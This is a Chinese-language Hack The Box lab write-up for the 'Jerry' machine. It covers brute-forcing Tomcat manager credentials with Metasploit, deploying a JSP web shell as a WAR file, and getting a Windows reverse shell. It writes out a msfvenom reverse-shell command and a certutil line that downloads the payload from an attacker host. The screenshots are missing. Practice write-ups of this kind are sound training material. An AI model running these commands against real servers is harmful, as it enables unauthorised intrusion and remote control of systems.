[Day26] HTB Jerry

• URL : https://app.hackthebox.eu/machines/144
• IP :10.129.1.110

Scan

• 扫 Port
  • rustscan -a 10.129.1.110 -r 1-65535
  • 
  • 发现有开8080

Brute Force

• 尝试 msf 爆破
  • auxiliary/scanner/http/tomcat_mgr_login
  • 发现密码是 tomcat:s3cret
  • 
• Wordlist
  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

进入 Manager APP

• 发现不登入直接按 Manager App 就可以进後台ㄌ= =
  • 
  • 
  • 

Web shell

• 准备 jsp web shell
  • https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jsp
    • 
  • jar -cvf cmd.war cmd.jsp
    • 
• 上传 webshell
  • 
• 执行 webshell
  • 
  • 发现本来就是 system 权限
• 确认系统资料
  • 
  • 64 bit

Reverse shell

• 准备 Reverse shell
  • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe > shell.exe
• 下载 reverse shell
  • certutil -urlcache -f http://10.10.16.35/shell.exe shell8787.exe
  • 
• 执行 Reverse shell
  • 
• 取得 Flag
  • 
  •